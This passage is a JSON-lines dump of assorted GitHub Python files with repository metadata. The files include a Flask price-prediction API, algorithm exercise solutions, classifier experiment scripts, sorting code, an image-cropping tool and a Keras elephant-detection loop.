41, 'Bhubaneswar': 42, 'Bhuj': 43, 'Bikaner': 44,\n 'Bilaspur': 45, 'Bokaro': 46, 'Chandigarh': 47, 'Chandrapur': 48, 'Chennai': 49, 'Chhindwara': 50,\n 'Chittoor': 51, 'Coimbatore': 52, 'Cuddalore': 53, 'Cuttack': 54, 'Dahod': 55, 'Dalhousie': 56, \n 'Darbhanga': 57, 'Darjeeling': 58, 'Dehradun': 59, 'Deoghar': 60, 'Dhanbad': 61, 'Dharuhera': 62, \n 'Dharwad': 63, 'Dhule': 64, 'Dibrugarh': 65, 'Durg': 66, 'Durgapur': 67, 'Eluru': 68, 'Ernakulam': 69,\n 'Erode': 70, 'Faizabad': 71, 'Faridabad': 72, 'Gadarwara': 73, 'Gadhinglaj': 74, 'Gandhidham': 75, \n 'Gandhinagar': 76, 'Gaya': 77, 'Ghaziabad': 78, 'Goa': 79, 'Godhra': 80, 'Gondia': 81, 'Gulbarga': 82,\n 'Guntur': 83, 'Gurdaspur': 84, 'Gurgaon': 85, 'Guwahati': 86, 'Gwalior': 87, 'Hajipur': 88, \n 'Haldia': 89, 'Haldwani': 90, 'Hapur': 91, 'Harda': 92, 'Haridwar': 93, 'Hassan': 94, 'Hathras': 95,\n 'Hazaribagh': 96, 'Hoshangabad': 97, 'Hoshiarpur': 98, 'Hosur': 99, 'Hubli': 100, 'Idukki': 101, \n 'Indore': 102, 'Jabalpur': 103, 'Jagdalpur': 104, 'Jaipur': 105, 'Jajpur': 106, 'Jalandhar': 107,\n 'Jalgaon': 108, 'Jalna': 109, 'Jammu': 110, 'Jamnagar': 111, 'Jamshedpur': 112, 'Jhansi': 113, \n 'Jharsuguda': 114, 'Jhunjhunu': 115, 'Jind': 116, 'Jodhpur': 117, 'Junagadh': 118, 'Kadapa': 119, \n 'Kadi': 120, 'Kakinada': 121, 'Kanchipuram': 122, 'Kangra': 123, 'Kannur': 124, 'Kanpur': 125,\n 'Karad': 126, 'Karaikudi': 127, 'Karjat': 128, 'Karnal': 129, 'Karwar': 130, 'Kharagpur': 131,\n 'Kochi': 132, 'Kolhapur': 133, 'Kolkata': 134, 'Kollam': 135, 'Korba': 136, 'Kota': 137, \n 'Kotdwara': 138, 'Kottayam': 139, 'Kurnool': 140, 'Kurukshetra': 141, 'Lalitpur': 142, \n 'Latur': 143, 'Lucknow': 144, 'Ludhiana': 145, 'Machilipatnam': 146, 'Madurai': 147,\n 'Maharashtra': 148, 'Malappuram': 149, 'Mangalore': 150, 'Margao': 151, 'Mathura': 152, \n 'Meerut': 153, 'Midnapore': 154, 'Mohali': 155, 'Moradabad': 156, 'Morbi': 157, 'Mumbai': 158,\n 'Muzaffarpur': 159, 'Mysore': 160, 'Nadiad': 161, 'Nagaon': 162, 'Nagapattinam': 163, \n 'Nagaur': 164, 'Nagpur': 165, 'Nainital': 166, 'Nanded': 167, 'Navsari': 168, 'Neemrana': 169, \n 'Nellore': 170, 'Nizamabad': 171, 'Noida': 172, 'Ongole': 173, 'Ooty': 174, 'Osmanabad': 175,\n 'Ottapalam': 176, 'Palakkad': 177, 'Palanpur': 178, 'Palghar': 179, 'Pali': 180, 'Palwal': 181,\n 'Panaji': 182, 'Panchkula': 183, 'Panipat': 184, 'Pathanamthitta': 185, 'Patiala': 186, \n 'Patna': 187, 'Phagwara': 188, 'Pondicherry': 189, 'Porbandar': 190, 'Pudukkottai': 191,\n 'Pune': 192, 'Puri': 193, 'Raichur': 194, 'Raigad': 195, 'Raigarh': 196, 'Raipur': 197, \n 'Raisen': 198, 'Rajkot': 199, 'Rajnandgaon': 200, 'Rajpura': 201, 'Ranchi': 202, \n 'Ratnagiri': 203, 'Rayagada': 204, 'Rewa': 205, 'Rewari': 206, 'Rishikesh': 207, \n 'Rohtak': 208, 'Roorkee': 209, 'Rourkela': 210, 'Rudrapur': 211, 'Sabarkantha': 212, \n 'Sagar': 213, 'Salem': 214, 'Sambalpur': 215, 'Satna': 216, 'Secunderabad': 217, 'Shimla': 218,\n 'Shirdi': 219, 'Siddipet': 220, 'Sikar': 221, 'Silchar': 222, 'Siliguri': 223, \n 'Sindhudurg': 224, 'Siwan': 225, 'Solan': 226, 'Solapur': 227, 'Sonipat': 228, \n 'Srikakulam': 229, 'Srinagar': 230, 'Surat': 231, 'Surendranagar': 232, 'Tenali': 233, \n 'Thanjavur': 234, 'Thoothukudi': 235, 'Thrissur': 236, 'Tirunelveli': 237, 'Tirupati': 238,\n 'Udaipur': 239, 'Udupi': 240, 'Ujjain': 241, 'Vadodara': 242, 'Valsad': 243, 'Vapi': 244, \n 'Varanasi': 245, 'Vellore': 246, 'Vidisha': 247, 'Vijayawada': 248, 'Visakhapatnam': 249, \n 'Visnagar': 250, 'Vizianagaram': 251, 'Warangal': 252, 'Wardha': 253, 'Washim': 254, \n 'Yavatmal': 255}\n@app.route('/api',methods=['POST'])\n@cross_origin()\ndef predict():\n data = request.get_json(force=True)\n val= [data[\"UNDER_CONSTRUCTION\"],data[\"BHK_NO.\"],data[\"SQUARE_FT\"],warehouse[data[\"City\"]]]\n val = [val]\n prediction = model.predict(pd.DataFrame(val,columns=['UNDER_CONSTRUCTION','BHK_NO.','SQUARE_FT','City']))\n print(prediction)\n output = prediction[0][0]\n if str(output) < '0':\n output='233'\n\n # output='hello'\n return jsonify(output)\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)","repo_name":"realvineeths/FlatHUB","sub_path":"serverflask/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74625166273","text":"def jewel_and_stones(jewels: str, stones: str)-> int:\n \"\"\"\n Given a string representing your stones and another string representing a list of jewels, \n return the number of stones that you have that are also jewels. \n\n Example: Given the following jewels and stones...\n\n jewels = \"abc\", stones = \"ac\", return 2\n jewels = \"Af\", stones = \"AaaddfFf\", return 3\n jewels = \"AYOPD\", stones = \"ayopd\", return 0 \n \"\"\"\n count = 0\n for s in stones:\n if s in jewels:\n count += 1\n return count\n\nif __name__ == \"__main__\":\n vals = [[\"abc\", \"ac\"], [\"Af\", \"AaaddfFf\"], [\"AYOPD\", \"ayopd\"]]\n\n for val in vals:\n print(jewel_and_stones(jewels=val[0], stones=val[1]))\n","repo_name":"Brian-Munene/DSA-challenges","sub_path":"jewel_and_stones.py","file_name":"jewel_and_stones.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36996763325","text":"class Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n if not grid or not grid[0]:\n return 0\n\n m, n = len(grid), len(grid[0])\n count = 0\n for i in range(m):\n for j in range(n):\n if grid[i][j] == '1':\n self.dfs(grid, i, j)\n count += 1\n return count\n \n def is_valid(self, grid, r, c):\n m, n = len(grid), len(grid[0])\n if r < 0 or c < 0 or r >= m or c >= n:\n return False\n return True\n\n def dfs(self, grid, r, c):\n grid[r][c] = '0'\n directions = [(0,1), (0,-1), (-1,0), (1,0)]\n for d in directions:\n nr, nc = r + d[0], c + d[1] \n if self.is_valid(grid, nr, nc) and grid[nr][nc] == '1':\n self.dfs(grid, nr, nc)","repo_name":"algorithm006-class02/algorithm006-class02","sub_path":"Week_03/G20200389010036/LeetCode_200_036.py","file_name":"LeetCode_200_036.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"18550524044","text":"import re\n\ndef calc_day06():\n with open(\"day06.txt\") as day06:\n lines = day06.read()\n\n answergroups = lines.split(\"\\n\\n\")\n\n part1 = 0\n part2 = 0\n\n groupanswers_or = set()\n for answergroup in answergroups:\n answers = answergroup.split()\n groupanswers_or.clear()\n groupanswers_and = set(list(answers[0]))\n for answer in answers:\n groupanswers_or |= set(list(answer))\n groupanswers_and &= set(list(answer))\n part1 += len(groupanswers_or)\n part2 += len(groupanswers_and)\n\n return part1, part2\n\nif __name__ == \"__main__\":\n part1, part2 = calc_day06()\n print(part1) # 6291\n print(part2) # 3052\n\n # python -m timeit -n 100 -s \"from day06 import calc_day06\" \"calc_day06()\"\n\n # baseline:\n # 100 loops, best of 5: 6.47 msec per loop\n\n # optimization 1: use the first answer instead of the alphabet for part 2\n # 100 loops, best of 5: 6.58 msec per loop\n\n # opt. 2: clearing the set instead of creating a new one for every group\n # 100 loops, best of 5: 6.48 msec per loop\n\n","repo_name":"Lewistrick/adventofcode2020","sub_path":"day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37984095542","text":"from __future__ import division # floating point division\nimport csv\nimport random\nimport math\nimport numpy as np\n\nimport dataloader as dtl\nimport classalgorithms as algs\n\n\ndef getaccuracy(ytest, predictions):\n correct = 0\n for i in range(len(ytest)):\n if ytest[i] == predictions[i]:\n correct += 1\n return (correct/float(len(ytest))) * 100.0\n\ndef geterror(ytest, predictions):\n return (100.0-getaccuracy(ytest, predictions))\n\n## k-fold cross-validation\n# K - number of folds\n# X - data to partition\n# Y - targets to partition\n# classalgs - a dictionary mapping algorithm names to algorithm instances\n#\n# example:\nclassalgs = {\n 'Logistic Regression': algs.LogitReg(),\n 'Neural Network': algs.NeuralNet({'epochs': 100})\n}\n\nparameters = (\n #{'regwgt': 0.0, 'nh': 4},\n {'regwgt': 0.01, 'nh': 8},\n {'regwgt': 0.05, 'nh': 16},\n {'regwgt': 0.1, 'nh': 32},\n )\n\n\ndef cross_validate(K, X, Y, classalgs):\n errors = {}\n numparams = len(parameters)\n\n for learnername in classalgs:\n errors[learnername] = np.zeros((numparams))\n\n set_len = len(X) / K\n\n for k in range(K):\n for p in range(numparams):\n params = parameters[p]\n\n for learnername,learner in classalgs.items():\n start = k*set_len\n Xtest_set = X[start:start+set_len]\n Ytest_set = Y[start:start+set_len]\n Xtrain_set = np.concatenate((X[0:start],X[start+set_len:len(X)]),axis=0)\n Ytrain_set = np.concatenate((Y[0:start],Y[start+set_len:len(Y)]),axis=0)\n\n # Reset learner for new parameters\n learner.reset(params)\n print ('Running learner = ' + learnername + ' on parameters ' + str(learner.getparams()))\n # Train model\n learner.learn(Xtrain_set, Ytrain_set)\n # Test model\n predictions = learner.predict(Xtest_set)\n error = geterror(Ytest_set, predictions)\n print ('Error for ' + learnername + ': ' + str(error))\n errors[learnername][p] = error\n\n for learnername, learner in classalgs.items():\n besterror = np.mean(errors[learnername][0,:])\n bestparams = 0\n for p in range(numparams):\n aveerror = np.mean(errors[learnername][p,:])\n if aveerror < besterror:\n besterror = aveerror\n bestparams = p\n\n\n best_algorithm = classalgs[p]\n return best_algorithm\n\n\nif __name__ == '__main__':\n\n trainsize = 5000\n testsize = 5000\n numruns = 10\n\n classalgs = {\n 'Random': algs.Classifier(),\n 'Naive Bayes': algs.NaiveBayes({'usecolumnones': False}),\n 'Naive Bayes Ones': algs.NaiveBayes({'usecolumnones': True}),\n 'Linear Regression': algs.LinearRegressionClass(),\n 'Logistic Regression': algs.LogitReg(),\n 'Neural Network': algs.NeuralNet({'epochs': 100}),\n 'LinearKernelLogitReg':algs.KernelLogitReg({'kernel':'linear','regwgt': 0.01, 'regularizer': 'None'}),\n 'HammingKernelLogitReg': algs.KernelLogitReg({'kernel': 'hamming', 'regwgt': 0.01, 'regularizer': 'None'})\n }\n numalgs = len(classalgs)\n\n parameters = (\n #{'regwgt': 0.0, 'nh': 4},\n {'regwgt': 0.01, 'nh': 8},\n {'regwgt': 0.05, 'nh': 16},\n {'regwgt': 0.1, 'nh': 32},\n )\n numparams = len(parameters)\n\n errors = {}\n for learnername in classalgs:\n errors[learnername] = np.zeros((numparams,numruns))\n\n for r in range(numruns):\n '''\n To run hamming distance kernel, please comment out line 75 and uncomment line 77\n '''\n trainset, testset = dtl.load_susy(trainsize,testsize)\n #trainset, testset = dtl.load_susy_complete(trainsize,testsize)\n #trainset, testset = dtl.load_census(trainsize,testsize)\n\n print(('Running on train={0} and test={1} samples for run {2}').format(trainset[0].shape[0], testset[0].shape[0],r))\n\n for p in range(numparams):\n params = parameters[p]\n for learnername, learner in classalgs.items():\n # Reset learner for new parameters\n learner.reset(params)\n print ('Running learner = ' + learnername + ' on parameters ' + str(learner.getparams()))\n # Train model\n learner.learn(trainset[0], trainset[1])\n # Test model\n predictions = learner.predict(testset[0])\n error = geterror(testset[1], predictions)\n print ('Error for ' + learnername + ': ' + str(error))\n errors[learnername][p,r] = error\n\n for learnername, learner in classalgs.items():\n besterror = np.mean(errors[learnername][0,:])\n bestparams = 0\n for p in range(numparams):\n aveerror = np.mean(errors[learnername][p,:])\n if aveerror < besterror:\n besterror = aveerror\n bestparams = p\n\n # Extract best parameters\n learner.reset(parameters[bestparams])\n print ('Best parameters for ' + learnername + ': ' + str(learner.getparams()))\n print ('Average error for ' + learnername + ': ' + str(besterror) + ' +- ' + str(np.std(errors[learnername][bestparams,:])/math.sqrt(numruns)))\n","repo_name":"wooloba/Classifiers","sub_path":"script_classify.py","file_name":"script_classify.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31766235800","text":"#!/usr/bin/python3\nfrom math import sin,cos,exp\n\n# Function to numerically differentiate\ndef f(z):\n return exp(z)*sin(z)\n\n# Initial step size, and position to evaluate the derivative at\nh=0.1\nx=1\n\n# Exact derivative\ndfexact=exp(x)*(cos(x)+sin(x))\n\nwhile h>1e-10:\n\n # Compute the derivative using the finite-difference stencil \n df=(f(x+2*h)+3*f(x)-4*f(x-h))/(6*h)\n\n # Print the numerical and exact derivatives, and the magnitude of absolute\n # error\n print(h,df,dfexact,abs(df-dfexact))\n\n # Divide the grid spacing by 2\n h*=0.5\n","repo_name":"chr1shr/math714","sub_path":"intro/deriv.py","file_name":"deriv.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"72444905474","text":"import random\nimport time\n\ndef test_data_ordered(n):\n return [i for i in range(n)]\n\ndef test_data_random(n):\n return [random.randint(0,1000) for _ in range(n)]\n\ndef check_sorted(alist):\n \"\"\"Zkontroluje, zda je posloupnost setřízená\"\"\"\n pass\n\nprint(test_data_ordered(10))\nprint(test_data_random(10))\n\ndef split(alist,l,r):\n pindex = (l+r)//2\n l0 = l\n r0 = r\n pivot = alist[pindex]\n print(\"Pivot: {}\".format(pivot))\n # Prohazování prvků tak, aby v první části byly\n # prvky menší než pivot a v druhé části větší rovny pivotu\n\n #l = 0\n #r = len(alist)-1\n\n l -= 1\n r += 1\n\n while True:\n # start:\n # jdu l doprava, dokud alist[l] < pivot\n l += 1\n while alist[l] < pivot:\n l += 1\n # jdu r doleva, dokud alist[l] >= pivot\n r -= 1\n while alist[r] > pivot:\n r -= 1\n #if r= pivot:\n # alist[pindex] = alist[l]\n # alist[l] = pivot\n\n # zkontroluji, zda se mi l a r nepřekřížily\n print(\"l: {}, r: {}\".format(l,r))\n if l >= r:\n # pokud ano, končím\n break\n else:\n # pokud ne, prohodím a pokračuji znovu od startu\n tmp = alist[l]\n alist[l] = alist[r]\n alist[r] = tmp\n\n # Vrací index pivota po prohazování\n return l-1\n\ndef split2(alist,l,r):\n #print(\"l: {}, r: {}\".format(l,r))\n pindex = (l+r)//2\n pivot = alist[pindex]\n #print(\"Pivot: {}\".format(pivot))\n while (l<=r):\n while (alist[l]pivot):\n r-=1\n if lalist[r]:\n tmp = alist[l]\n alist[l] = alist[r]\n alist[r] = tmp\n if r-l <= 1:\n return\n # rozdělí seznam na části menší než pivot, pivota a >= pivotu\n #print(\"List pre: {}\".format(alist[l:r+1]))\n (midl,midr) = split2(alist,l,r)\n #print(\"List post: {}\".format(alist[l:r+1]))\n #print(\"L: {}, R: {}, midl: {}, midr: {}\".format(l,r,midl,midr))\n # zarekurzí se na levou část\n qs(alist,l,midr)\n # zarekurzí se na pravou část\n qs(alist,midl,r)\n\ndef quick_sort(alist):\n qs(alist,0,len(alist)-1)\n\nalist = [1,2,3,4,5]\nquick_sort(alist)\nprint(\"Vysledek: {}\".format(alist))\nprint()\nalist = [5,4,3,2,1]\nquick_sort(alist)\nprint(\"Vysledek: {}\".format(alist))\nprint()\nalist = [1,1,1,1,1]\nquick_sort(alist)\nprint(\"Vysledek: {}\".format(alist))\nprint()\nalist = [1,4,1,2,8]\nquick_sort(alist)\nprint(\"Vysledek: {}\".format(alist))\n\n\nalist = test_data_random(10)\nquick_sort(alist)\nprint(\"Vysledek je {} a je : {}\".format(alist == sorted(alist),alist))\n\nfor _ in range(1000):\n alist = test_data_random(1000)\n quick_sort(alist)\n if alist != sorted(alist):\n print(\"Sorted wrong!\")\n exit(1)\n\n\ndef select_sort(alist):\n \"\"\"Vraci setrizeny seznam\"\"\"\n for i in range(len(alist)):\n minindex = -1\n minval = 100000000\n for j in range(i,len(alist)):\n if minval > alist[j]:\n minindex = j\n minval = alist[j]\n tmp = alist[i]\n alist[i] = alist[minindex]\n alist[minindex] = tmp\n\ndata = test_data_random(10000)\nstart = time.time()\nselect_sort(data)\nend = time.time()\n#print(data)\n\nprint(\"Trvalo to {:.3} s\".format(end-start))\n\n","repo_name":"xtompok/prg2","sub_path":"sort/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20059880350","text":"# -*- coding: utf-8 -*-\n'''\n Author : Huseyin BIYIK \n Year : 2017\n License : GPL\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n'''\nfrom PySide import QtGui\n\nfrom libpyscl import log\nfrom lxml.etree import QName\n\n\nclass NODES(object):\n def __init__(self, tree, scl):\n self.__tree = tree\n self.scl = scl\n\n def build(self):\n self.__tree.clear()\n\n def loop(base, root):\n for node in root:\n name = QName(node.tag)\n display = name.localname\n values = node.values()\n if values:\n display += \"[%s]\" % \":\".join(values)\n treeitem = QtGui.QTreeWidgetItem(base, [display])\n if node.getchildren():\n loop(treeitem, node)\n\n loop(self.__tree, self.scl.scl.getroot())\n","repo_name":"hbiyik/easyscl","sub_path":"src/libpyscl/elements/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71307780353","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nfrom io import open\nimport pickle\n\nclass PersonFiles:\n\n # Constructor de clase\n def __init__(self, name, personId, hairColor=\" \", glasses=\" \", gender=\" \", age=0):\n self.name = name\n self.personId = personId\n self.hairColor = hairColor\n self.glasses = glasses\n self.gender = gender\n self.age = age\n print('The person {} has been saved in file personsGroup.pckl'.format(self.name))\n\n def __str__(self):\n return '{} has {} hair, {}, is approximately {} years old and is {}'.format(\n self.name, self.hairColor, self.glasses, self.age, self.gender)\n\nclass Group:\n\n persons = []\n temp = []\n\n # Constructor de clase\n def __init__(self):\n self.load()\n\n def add(self,p):\n self.persons.append(p)\n self.save()\n\n def show(self):\n if len(self.persons) == 0:\n print(\"The group is empty in edit_files\")\n return\n \n for p in self.persons:\n print(p)\n\n def load(self):\n file = open('personsGroup.pckl', 'ab+')\n file.seek(0)\n try:\n self.persons = pickle.load(file)\n except:\n print(\"The File is Empty in edit_files\")\n finally:\n file.close()\n print(\"{} persons loaded in edit_files\".format(len(self.persons)))\n \n def delete(self,name):\n self.load()\n temp = []\n flag = False\n if len(self.persons) == 0:\n print(\"The group is empty in edit_files\")\n return\n for person in self.persons:\n if person.name != name:\n temp.append(person)\n else:\n flag = True\n print(\"{} deleted in editfiles\".format(name))\n if not flag:\n print(\"{} is not in group in editfiles\".format(name))\n self.persons = temp;\n self.save()\n \n def save(self):\n file = open('personsGroup.pckl', 'wb')\n pickle.dump(self.persons, file)\n file.close()\n","repo_name":"carlosquinterop/SinfoniaPepperTeam","sub_path":"sinfonia_pepper_tools_interaction/scripts/Class/edit_files.py","file_name":"edit_files.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"25487401891","text":"from argparse import ArgumentParser\n\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom models.ViT import ViT\n\nmnist_classes = [str(ii) for ii in range(10)]\nfruit_classes = ['Apple Braeburn', 'Apple Crimson Snow', 'Apple Golden 1', 'Apple Golden 2', 'Apple Golden 3',\n 'Apple Granny Smith', 'Apple Pink Lady', 'Apple Red 1', 'Apple Red 2', 'Apple Red 3',\n 'Apple Red Delicious', 'Apple Red Yellow 1', 'Apple Red Yellow 2', 'Apricot', 'Avocado ripe',\n 'Avocado', 'Banana Lady Finger', 'Banana Red', 'Banana', 'Beetroot', 'Blueberry', 'Cactus fruit',\n 'Cantaloupe 1', 'Cantaloupe 2', 'Carambula', 'Cauliflower', 'Cherry 1', 'Cherry 2', 'Cherry Rainier',\n 'Cherry Wax Black', 'Cherry Wax Red', 'Cherry Wax Yellow', 'Chestnut', 'Clementine', 'Cocos',\n 'Corn Husk', 'Corn', 'Cucumber Ripe 2', 'Cucumber Ripe', 'Dates', 'Eggplant', 'Fig', 'Ginger Root',\n 'Granadilla', 'Grape Blue', 'Grape Pink', 'Grape White 2', 'Grape White 3', 'Grape White 4',\n 'Grape White', 'Grapefruit Pink', 'Grapefruit White', 'Guava', 'Hazelnut', 'Huckleberry', 'Kaki',\n 'Kiwi', 'Kohlrabi', 'Kumquats', 'Lemon Meyer', 'Lemon', 'Limes', 'Lychee', 'Mandarine', 'Mango Red',\n 'Mango', 'Mangostan', 'Maracuja', 'Melon Piel de Sapo', 'Mulberry', 'Nectarine Flat', 'Nectarine',\n 'Nut Forest', 'Nut Pecan', 'Onion Red Peeled', 'Onion Red', 'Onion White', 'Orange', 'Papaya',\n 'Passion Fruit', 'Peach 2', 'Peach Flat', 'Peach', 'Pear 2', 'Pear Abate', 'Pear Forelle',\n 'Pear Kaiser', 'Pear Monster', 'Pear Red', 'Pear Stone', 'Pear Williams', 'Pear', 'Pepino',\n 'Pepper Green', 'Pepper Orange', 'Pepper Red', 'Pepper Yellow', 'Physalis with Husk', 'Physalis',\n 'Pineapple Mini', 'Pineapple', 'Pitahaya Red', 'Plum 2']\n\n\ndef main():\n # root_path = ''\n\n parser = ArgumentParser()\n parser.add_argument('--dataset', type=str)\n parser.add_argument('--weights', type=str)\n parser.add_argument('--image-path', type=str)\n args = parser.parse_args()\n\n assert args.dataset in ['fruit', 'mnist']\n\n if args.dataset == 'mnist':\n model = ViT.load_from_checkpoint(\n args.weights,\n image_size=28,\n patch_size=7,\n num_channels=1,\n num_classes=len(mnist_classes),\n d_model=128,\n num_blocks=6,\n num_heads=8,\n mvp_head=512,\n dropout=0.1,\n displ_attention=True,\n )\n else:\n model = ViT.load_from_checkpoint(\n args.weights,\n image_size=100,\n patch_size=10,\n num_channels=3,\n num_classes=len(fruit_classes),\n d_model=128,\n num_blocks=6,\n num_heads=8,\n mvp_head=512,\n dropout=0.1,\n displ_attention=True,\n )\n\n image = Image.open(args.image_path)\n image_normalized = transforms.ToTensor()(image).unsqueeze(0)\n # print(f\"image shape: {image_normalized.size()}\")\n\n model.eval()\n logits = model(image_normalized)\n pred = torch.argmax(logits, dim=-1).item()\n\n pred_label = mnist_classes[pred] if args.dataset == 'mnist' else fruit_classes[pred]\n\n print(f\"Predicted label: {pred_label}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"homomorfism/vision-transformer-pytorch","sub_path":"test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74989397954","text":"#批量裁剪至256*256\n\nimport torch.utils.data as data\nfrom glob import glob\nfrom PIL import Image\nimport torchvision.transforms as transforms\nimport argparse\nimport os\nimport imageio\nimport numpy as np\nimport pandas as pd\ndef get_all_path(open_file_path):\n rootdir = open_file_path\n path_list = []\n list = os.listdir(rootdir) # 列出文件夹下所有的目录与文件\n for i in range(0, len(list)):\n com_path = os.path.join(rootdir, list[i])\n #print(com_path)\n if os.path.isfile(com_path):\n path_list.append(com_path)\n if os.path.isdir(com_path):\n path_list.extend(get_all_path(com_path))\n #print(path_list)\n return path_list\n\n\nclass DataSet(data.Dataset):\n def __init__(self, img_dir, resize):\n super(DataSet, self).__init__()\n # self.img_paths = glob('{:s}/*'.format(img_dir))\n self.img_paths = get_all_path(img_dir)\n self.transform = transforms.Compose([\n transforms.Resize(int(resize * 76 / 64)),\n transforms.RandomCrop(resize),\n transforms.RandomHorizontalFlip()])\n self.data_dir = img_dir\n\n def load_bbox(self):\n data_dir = self.data_dir\n bbox_path = os.path.join(data_dir, '/Users/liailin/Downloads/DM-GAN/data/birds/CUB_200_2011/bounding_boxes.txt')\n df_bounding_boxes = pd.read_csv(bbox_path,\n delim_whitespace=True,\n header=None).astype(int)\n #\n filepath = os.path.join(data_dir, '/Users/liailin/Downloads/DM-GAN/data/birds/CUB_200_2011/images.txt')\n df_filenames = \\\n pd.read_csv(filepath, delim_whitespace=True, header=None)\n filenames = df_filenames[1].tolist()\n print('Total filenames: ', len(filenames), filenames[0])\n #\n filename_bbox = {img_file[:-4]: [] for img_file in filenames}\n numImgs = len(filenames)\n for i in range(0, numImgs):\n # bbox = [x-left, y-top, width, height]\n bbox = df_bounding_boxes.iloc[i][1:].tolist()\n\n key = filenames[i][:-4]\n filename_bbox[key] = bbox\n #\n return filename_bbox\n\n\n\n def __getitem__(self, item):\n\n img = Image.open(self.img_paths[item]).convert('RGB')\n if os.path.basename(self.data_dir)=='birdGT':\n width, height = img.size\n self.bbox = self.load_bbox()\n (filepath, tempfilename) = os.path.split(self.img_paths[item])\n (filepath1, tempfilename1) = os.path.split(filepath)\n key=tempfilename1+'/'+os.path.splitext(tempfilename)[0]\n bbox = self.bbox[key]\n r = int(np.maximum(bbox[2], bbox[3]) * 0.75)\n center_x = int((2 * bbox[0] + bbox[2]) / 2)\n center_y = int((2 * bbox[1] + bbox[3]) / 2)\n y1 = np.maximum(0, center_y - r)\n y2 = np.minimum(height, center_y + r)\n x1 = np.maximum(0, center_x - r)\n x2 = np.minimum(width, center_x + r)\n img = img.crop([x1, y1, x2, y2])\n\n img = self.transform(img)\n\n return img, self.img_paths[item]\n\n def __len__(self):\n return len(self.img_paths)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--img_dir', type=str, default='flowerGT')\n parser.add_argument('--resize', type=int, default=256)\n parser.add_argument('--save_dir', type=str, default='flowerGT256')\n args = parser.parse_args()\n\n if not os.path.exists(args.save_dir):\n os.mkdir(args.save_dir)\n dataset = DataSet(args.img_dir, args.resize)\n print('dataset:', len(dataset))\n\n for i in range(len(dataset)):\n img, path = dataset[i]\n path = os.path.basename(path)\n print('Processing:', path)\n\n imageio.imwrite(args.save_dir+'/{:s}'.format(path), img)\n\n\n\n\n","repo_name":"zjuirene/tools","sub_path":"crop_image256.py","file_name":"crop_image256.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"515930208","text":"import os\r\nimport time\r\nfrom keras.models import load_model\r\nfrom PIL import Image, ImageOps\r\nimport numpy as np\r\nimport json\r\nimport datetime\r\n\r\nfpath = 'C:\\\\out'\r\n\r\nwhile True:\r\n # Get a list of all files in the folder\r\n files = os.listdir(fpath)\r\n file_count = len([f for f in os.listdir(fpath) if os.path.isfile(os.path.join(fpath, f))])\r\n\r\n if file_count >= 6:\r\n np.set_printoptions(suppress=True)\r\n model = load_model('./keras_model.h5', compile=False)\r\n # determined by the first position in the shape tuple, in this case 1\r\n data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\r\n\r\n image = Image.open('C:\\\\out/5.bmp').convert(\"RGB\")\r\n\r\n size = (224, 224)\r\n image = ImageOps.fit(image, size, Image.Resampling.LANCZOS)\r\n\r\n image_array = np.asarray(image)\r\n\r\n normalized_image_array = (image_array.astype(np.float32) / 127.5) - 1\r\n\r\n data[0] = normalized_image_array\r\n\r\n prediction = model.predict(data)\r\n index = np.argmax(prediction)\r\n confidence_score = prediction[0][index]\r\n\r\n if index == 0:\r\n z = {\r\n \"status\": True,\r\n }\r\n y = json.dumps(z)\r\n print(y)\r\n else:\r\n z = {\r\n \"status\": False,\r\n }\r\n y = json.dumps(z)\r\n print(y)\r\n\r\n # Loop through each file and delete it\r\n for file_name in files:\r\n # Construct the full file path by joining the folder path and file name\r\n file_path = os.path.join(fpath, file_name)\r\n # Check if the file is a file (not a directory)\r\n if os.path.isfile(file_path):\r\n # Delete the file\r\n os.remove(file_path)\r\n break\r\n else:\r\n time.sleep(3)","repo_name":"ajthdaniel24/Elephant-detection-and-alert-System","sub_path":"Classifications.py","file_name":"Classifications.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7607426433","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 14 13:08:20 